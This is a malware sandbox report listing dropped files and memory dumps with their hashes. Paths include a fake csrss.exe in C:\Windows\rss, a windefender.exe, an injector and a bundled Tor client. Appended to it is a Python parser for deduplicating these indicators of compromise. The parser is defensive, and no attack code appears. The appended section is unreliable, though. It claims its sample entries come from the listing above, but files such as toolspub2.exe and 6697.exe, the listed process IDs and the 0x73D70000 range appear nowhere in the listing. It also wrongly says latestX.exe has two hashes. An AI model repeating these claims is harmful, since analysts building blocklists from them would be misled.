C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\6ABE.exe.log
| MD5 | 9f5d0107d96d176b1ffcd5c7e7a42dc9 |
| SHA1 | de83788e2f18629555c42a3e6fada12f70457141 |
| SHA256 | d0630b8466cebaaf92533826f6547b6f36a3c480848dc38d650acd52b522a097 |
| SHA512 | 86cfaa3327b59a976ddd4a5915f3fe8c938481344fcbd10e7533b4c5003673d078756e62435940471658a03504c3bc30603204d6a133727a3f36c96d08714c61 |
memory/3556-211-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp
memory/3556-212-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp
memory/3556-214-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp
memory/3556-218-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp
memory/3556-220-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp
memory/3556-226-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp
memory/3556-230-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp
memory/3556-238-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp
memory/3556-240-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp
memory/3556-236-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp
memory/3556-234-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp
memory/3556-232-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp
memory/3556-228-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp
memory/3556-224-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp
memory/3556-222-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp
memory/3556-216-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_12axlfji.xpk.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 3d086a433708053f9bf9523e1d87a4e8 |
| SHA1 | b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28 |
| SHA256 | 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69 |
| SHA512 | 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 1f97138cbf4adb76aa8e557c25ced070 |
| SHA1 | 6abc938a044f15d11a5c3f2c2ea1c3d15ed460d5 |
| SHA256 | 57e27086d196f5ab95faab4bd72fd608eb13b4f70ab7fa1e15cf846d67b3f64d |
| SHA512 | 8e7f0228ae05d86b9ed65279a4904e04eedd5c4ad030373b05f84990ceb1b942e208ef94fecea100f685d1e9690fceda2a4e96075059bdb2cd240f348908ebb9 |
C:\Users\Admin\AppData\Roaming\Tags\Settings.exe
| MD5 | 73ae6c3b85c619aa3fb06de545597251 |
| SHA1 | eb1aebe3b76ca3a2b5075880a307c7da2a7d4526 |
| SHA256 | 622b9f4f5d1eb80a8d6c0384d4c2cc62db85499005cbc5efb35e0fd343db7427 |
| SHA512 | 912a6aac98a5e83d9519b9bb40efebe843d5265768a702c5523161ba2edd422d7c7d743eaac8c5ddab6719f2500a9826979baab2ed22d0bd7d6be66f56d59923 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 81e219617f0f5835723d7920b8387504 |
| SHA1 | 790ca8b4b2c2412d569497270e2c5a7fc2196536 |
| SHA256 | a937f01ca7c5e481c72593fa847c302939665933173f53428ab43491c4f62a7d |
| SHA512 | 02b2ba7656d9ad5b2b850ba6fb04be2a10a10f5e275ab592514f185d084744c1b5597dbdf0c8745e0ffc3bbde5768c2ff3aa05417b2a7aecff9b7c0ed36bdb36 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 62623d22bd9e037191765d5083ce16a3 |
| SHA1 | 4a07da6872672f715a4780513d95ed8ddeefd259 |
| SHA256 | 95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010 |
| SHA512 | 9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992 |
C:\Windows\rss\csrss.exe
| MD5 | 15ccfec965d35354a2142fac5324dcb3 |
| SHA1 | 4147dc51f89f068e1dd86746e00cb6e6f2a3fc4f |
| SHA256 | 4b275ec3c098c462846995c7281e90284059904e5494ce9b8cfd21571978198b |
| SHA512 | 3513db0d2f52873a5a23b29735e95e505ad0fea292771b5dc8df03dc100d1b5ecbb619842df7179b4c7452cb1cdd00691e23f9f8f98d436f587cd237d34f9500 |
C:\Windows\rss\csrss.exe
| MD5 | 5ede9444cd75f9459b2e9b342459f505 |
| SHA1 | ff1ba9423b3eb54a92acf4b70ec5e8d4f7d26627 |
| SHA256 | 339ab9ea5338eec72519fa58ec8bb6733d25eff99e496031e1b1ddef936384c2 |
| SHA512 | f28278aaf5f762dd276e52f8d20651a3298892a268cfbe5459828dfa2b37ec3762061475e36738d1646e35ed6570d596742a454f4cf0c46b9eaef280286f88f4 |
C:\Users\Admin\AppData\Local\Temp\29EA.exe
| MD5 | 5a45609af5960a9c4dbc014c4b5d244c |
| SHA1 | b7bf85e0744b6cadb9ab9455b30ea834f39faf7f |
| SHA256 | 203fc9ad7667f1dcff5617a0659a69ca00b50cee6e16d3d6d5b954d77da9f804 |
| SHA512 | 8096d82113efb5ca683c54581203c323af02748583e790310e63f702e9f0f2f20fbcc601d45201a4651432a644657998e7969ea4ceea618b6be6f1dfd52a74de |
C:\Users\Admin\AppData\Local\Temp\latestX.exe
| MD5 | 32a27baad5f258034ce06ac6af2f50d9 |
| SHA1 | f66f4139e0a93f52124d574c7b2ac4bdb86003c8 |
| SHA256 | 06b33d357ebfaa95a0bf8ceb20fedc532429e41890eb0f9aa7ff657f1d352eb2 |
| SHA512 | 25c75feae11baf22deb122469a72ce06ee08e38ee12325ff5021829092fad935694f9a6e3029ac4570b95440f9b967586d21630ec1e08736aa347eba0be5d334 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 7cb0337b756d69a7be3033dd6e382832 |
| SHA1 | baa60488b56bf731f0b819cb6ec776cc26af2369 |
| SHA256 | 19ded27b35a890678e81e21c70cc763137f03d4febca3292b68fc1f044b8750e |
| SHA512 | dc0876bba041e50161038b6de01fae930ebeef81807192a850113b5a2272a06cf9104214c27fbdd3028874e55a2c162b1da5018b80fb518944084d7763d78ce3 |
C:\Program Files\Google\Chrome\updater.exe
| MD5 | 95da659749eface0e13cfb3d0e14066a |
| SHA1 | bd603217113e715b5b2db6728ad7e82d2def6691 |
| SHA256 | 41918960565fee217f130bfe086619658754b4d891612287c0b855bd34cdb4c1 |
| SHA512 | 2b0e3f07b0c74775e9dd10b2f82dd22f7e6800f8c6d333b9551272a7858394c5c17ef0139b235f76bab75199ece2103e583ac9f63cc7bcf95188c3d69076228a |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 6bfa1a8bfcd8eb3af582a86a9ab3c742 |
| SHA1 | 398fcd6058976d0d2ce35837de57eaf41f8cd852 |
| SHA256 | 8487b79837e76c55c238e74aed5fa5149c1a968843909cc761c3065461b4ff0b |
| SHA512 | ce17087ffab56c3465e79d0625847accab9d4fda12a7ae3755c205f3e3aff4fe53a6625954dccb550d4b31bebfc47865d40a5b58269b7730d5b2839a6e9435c7 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | e05eafdd49496642c93745c94d61c128 |
| SHA1 | 7108db5d99ae116a283c7203ce3c55f3e222b620 |
| SHA256 | 53eb2bc0ed32d4184e202ae5602b31b2dfc3207bc0b2bee56f38bce02dbd8dc5 |
| SHA512 | b34f56b5a82e8dd6d08fdbad72ca8aee168a7d3a78ebba69f5446b8e58bf6407a29b44389d11ab6ab69a30259894a520f8db8f643220799ad18e4e4c3f3d4494 |
C:\Users\Admin\AppData\Local\Temp\6D0E.exe
| MD5 | 36dfcd31a45ce2c580f008b20e6cd2ad |
| SHA1 | a245d87d7ef799d9aded126e39d5372fb430139e |
| SHA256 | 3bcc0a133a93c3e05b01f496eb9c27b8c74104d5857dfb93aa8a08e6989520ac |
| SHA512 | 72971986db21b0023971361c825de2599c2ae4c5d8e837226a11f4363cdb9da671a5078c09dd72d62f4b8ecc1071051918b37d297a6d7a991f539d102236942d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7e00b0c35233794af15148d463815bec |
| SHA1 | d8cee4abcc48d649d103345e4526b3c6fdf03178 |
| SHA256 | 9e1c6d4262a26af1582583523b00e275b661df50a81f7ea967f7b60f4545d58c |
| SHA512 | 04d3b2578827b7cd15c491a71a7145e7bb54263c40de9b4703895e1dbe65ce756e067c1b756e9e05bc2a36ef68d1ba1205bf04e32b8ba7f2ccaa5b44faf85f69 |
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
C:\Users\Admin\AppData\Local\Temp\8DE5.exe
| MD5 | e519e00feb6e0534ba2154b9e865c184 |
| SHA1 | f4f4980c16a9aaa7c331811be95dd9900f5a09b9 |
| SHA256 | d694d11e2ced3fdd0ce34ab097ac2dc50db3e3ce026d65426a37b294ea4b90eb |
| SHA512 | a86d68795f0c774b2aef7ad4e4b90f21d67757255d171ff2bea753381aabd040f63048cda43ea852827c5b01da83ffa0b1236667b991d331710b9526106fd4ef |
C:\Windows\windefender.exe
| MD5 | 438fd3bcbc8794dcc50fb770b7bbc271 |
| SHA1 | f9242a03498fcd58766079919fc07c2d12aacef2 |
| SHA256 | c66c679eeedf575beeed45e9968c231c74eac6404ea945dff4abfa8852ec6841 |
| SHA512 | 5fd76745ecc510697a0405fbf79960b36042a88096f97d5fb6e99fe5abf168b3af073d9ba88273b0f4087bcc313aee625b93261d189ce72af21583bf2f08edd4 |
C:\Windows\windefender.exe
| MD5 | b5041f6d6e06f6ef2c9a57b7f71bd754 |
| SHA1 | ebd4fbce7add1fc506fe8acfd3a16754dadd067d |
| SHA256 | 1d0db51ce2bf3a8d6c51bc2a912e8085fb32f4b7776057243f9bc868a4d71199 |
| SHA512 | 2863415208e05e54459ef4711fa83f4c636384887ace921f0039ad5f4c9ab14488032c5c96070f906839c74ce148c78ed4a3a503821fd37d0aa84222c48a7c50 |
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libcrypto-1_1.dll
| MD5 | b7c32c8e7d21aa9b79470037227eba43 |
| SHA1 | 38d719b10ca035cee65162c1a44e2c62123d41b4 |
| SHA256 | 99b4042a858a9e437917c8256692e9ba161b87054ccf5e22538e86bb35c34f23 |
| SHA512 | d85345380b9605c8484e11873218aa4eaeea573ca51eedada6d0518695a2b184bb22faf7c5e3d88330935774ced17e9d80c577b06603aa1ca6dab748b0bd15a7 |
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libevent-2-1-7.dll
| MD5 | 736443b08b5a52b6958f001e8200be71 |
| SHA1 | e56ddc8476aef0d3482c99c5bfaf0f57458b2576 |
| SHA256 | da1f75b9ce5f47cb78a6930a50c08397ee4d9778302746340f4057fcd838dbf4 |
| SHA512 | 9dfcdb1186b089e7961767d427de986ad8e5f7715b7592984349d0b8e7f02198137c83e8c79a096a7475ad9f4695f52539fa08fa65912860ddf0a85515a7cda1 |
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libssp-0.dll
| MD5 | 7cdbaca31739500aefc06dd85a8558ff |
| SHA1 | adc36ec6a3cdc7e57a1b706c820e382627f6cb90 |
| SHA256 | 0a1dee5dd5234971f7526f3d5f8b7e2cfdcb536e18debd51c985010fb504fbdb |
| SHA512 | 6df8ac9054f27ebbef9642ce79ff7ba836411ea0ed0bd04b3cfe724a336a91f665c2cc0b7a4bfc99a80786d1a6d361b971a7dbb7a298b919a1baa812541841ba |
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe
| MD5 | 16f6d83195f39bda25fef182fd1ac5c4 |
| SHA1 | cb8d57181bf338c1e36f8baba92d7453569f58b1 |
| SHA256 | e35a3356b6c1565c842ceb03a311da29740a036894c42bee0d23efd5563a9cb5 |
| SHA512 | fd04fa2f660601a70555719feb8598c33bce0c882957079f4723908c6ce90613b4b6ce9e38ba0565e6c2479acfce4bef91a587a2fc632f2e84b65587abe2fa3a |
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe
| MD5 | 58edee3c1e45c722f305f465e4d2d257 |
| SHA1 | fb299dcd6d7da4383b5cad4f232f9b27695c6299 |
| SHA256 | 4f750d3088bbccb4822a84384092d85d605c8b3adc09b5f6245f4485a9ebf786 |
| SHA512 | 22a0ebaf2bbc9099cdc8305642106785663b7c9ed7867dca171536f6ac92ebee90c4bcf01ebe9c59b493bdbe9d2bb324f9ccb22c343729ed55ad8fedd8ccc91d |
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\cached-microdesc-consensus.tmp
| MD5 | fd6962e009deecea212d5b1fc87f0b05 |
| SHA1 | 4e81c663018c08624c1f8db07fe115b19d1323ce |
| SHA256 | 40f2a6e756e24334222220a2b38cf7124a97d8af031bf5232fe8f5e4322d2220 |
| SHA512 | c72533565dece8cd70a88ca1d0460fd1ccebb7c4ebd75a0e1b57bc9f601926aac3330eb076bd319b052eede641a37b46db3e8d39d0e2d51488b23f37bf5aa88b |
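Added example, not part of the sandbox report: a Python parser for the listing layout used above (a path line followed by `| ALGO | hash |` rows, and `memory/PID-N-0xSTART-0xEND-memory.dmp` lines), run on a constructed sample of entries copied from this section. It answers three triage questions the raw listing makes hard to see: which dropped files are actually distinct once repeated (path, SHA256) entries are collapsed; which paths were written with more than one hash (above, C:\Windows\rss\csrss.exe, C:\Windows\windefender.exe, 6697.exe, latestX.exe and tor.exe each appear with two different payloads, so a blocklist built from the first hash seen misses the second); and which memory-dump address range recurs across processes (0x73D70000-0x74520000 is dumped from PIDs 1800, 3512, 4780 and 2360). Reading that recurring range as one shared module mapped at the same base, rather than four separate payloads, is an inference from the addresses and not something the report states. `SAMPLE` is constructed here; the parser assumes the layout shown and nothing about the sandbox's export format beyond it.

```python
"""Turn a sandbox 'dropped files / memory dumps' listing into a deduplicated IOC set.

Added example for this report, not sandbox output. Parses the layout used above
(path line, then '| ALGO | hash |' rows; 'memory/PID-N-0xSTART-0xEND-memory.dmp'
lines) and reports unique files, paths rewritten with a different payload, and
memory regions that recur across processes.
"""
import re
from collections import defaultdict

HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")
DUMP_LINE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")

# Constructed sample in the report's own layout (entries copied from the section above).
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | dcbd05276d11111f2dd2a7edf52e3386 |
| SHA256 | cea5245bab036b03f89d549c71f47df8a14854b0de515643bf95319ec5af71d4 |
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | dcbd05276d11111f2dd2a7edf52e3386 |
| SHA256 | cea5245bab036b03f89d549c71f47df8a14854b0de515643bf95319ec5af71d4 |
C:\Windows\rss\csrss.exe
| MD5 | 15ccfec965d35354a2142fac5324dcb3 |
| SHA256 | 4b275ec3c098c462846995c7281e90284059904e5494ce9b8cfd21571978198b |
C:\Windows\rss\csrss.exe
| MD5 | 5ede9444cd75f9459b2e9b342459f505 |
| SHA256 | 339ab9ea5338eec72519fa58ec8bb6733d25eff99e496031e1b1ddef936384c2 |
memory/1800-74-0x0000000073D70000-0x0000000074520000-memory.dmp
memory/3512-103-0x0000000073D70000-0x0000000074520000-memory.dmp
memory/4780-106-0x0000000073D70000-0x0000000074520000-memory.dmp
memory/4780-105-0x0000000000400000-0x000000000046F000-memory.dmp
"""


def parse_listing(text):
    """Return (files, dumps). files: list of {'path', 'hashes'}; dumps: list of
    (pid, index, start, end) with addresses as ints. Any non-empty line that is
    neither a hash row nor a dump line starts a new file entry."""
    files, dumps, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = DUMP_LINE.match(line)
        if m:
            pid, idx, start, end = m.groups()
            dumps.append((int(pid), int(idx), int(start, 16), int(end, 16)))
            continue
        m = HASH_ROW.match(line)
        if m:
            if current is None:
                raise ValueError("hash row before any path line: %r" % line)
            current["hashes"][m.group(1)] = m.group(2).lower()
            continue
        current = {"path": line, "hashes": {}}
        files.append(current)
    return files, dumps


def unique_files(files):
    """Collapse repeated (path, SHA256) entries: the report lists a file once per
    write event, and identical entries carry no extra information for an IOC set."""
    seen = {}
    for f in files:
        key = (f["path"], f["hashes"].get("SHA256"))
        seen.setdefault(key, f["hashes"])
    return seen


def rewritten_paths(files):
    """Paths that appear with more than one SHA256: the same name was reused for a
    different payload. A single-hash blocklist built from the first entry misses these."""
    by_path = defaultdict(set)
    for f in files:
        if "SHA256" in f["hashes"]:
            by_path[f["path"]].add(f["hashes"]["SHA256"])
    return {p: s for p, s in by_path.items() if len(s) > 1}


def shared_regions(dumps):
    """Map (start, end) -> sorted PIDs for ranges dumped from more than one process.
    An identical range at the same base in several processes is usually one shared
    module, not a per-process payload; treat it as lower priority for carving."""
    pids = defaultdict(set)
    for pid, _idx, start, end in dumps:
        pids[(start, end)].add(pid)
    return {r: sorted(p) for r, p in pids.items() if len(p) > 1}


def region_size(region):
    start, end = region
    return end - start


if __name__ == "__main__":
    files, dumps = parse_listing(SAMPLE)
    for (path, sha256), _ in unique_files(files).items():
        print(sha256, path)
    for path, shas in rewritten_paths(files).items():
        print("REWRITTEN:", path, sorted(shas))
    for region, pids in shared_regions(dumps).items():
        print("shared 0x%X-0x%X (%d bytes) in PIDs %s" % (*region, region_size(region), pids))
```

Run as a script it prints the unique IOC rows, the rewritten paths and the shared regions for the sample; pass the whole listing above to `parse_listing` instead of `SAMPLE` to triage the full section. Entries whose SHA256 row is missing (the partial first entry at the top of this section, for example) are still kept, keyed on path alone.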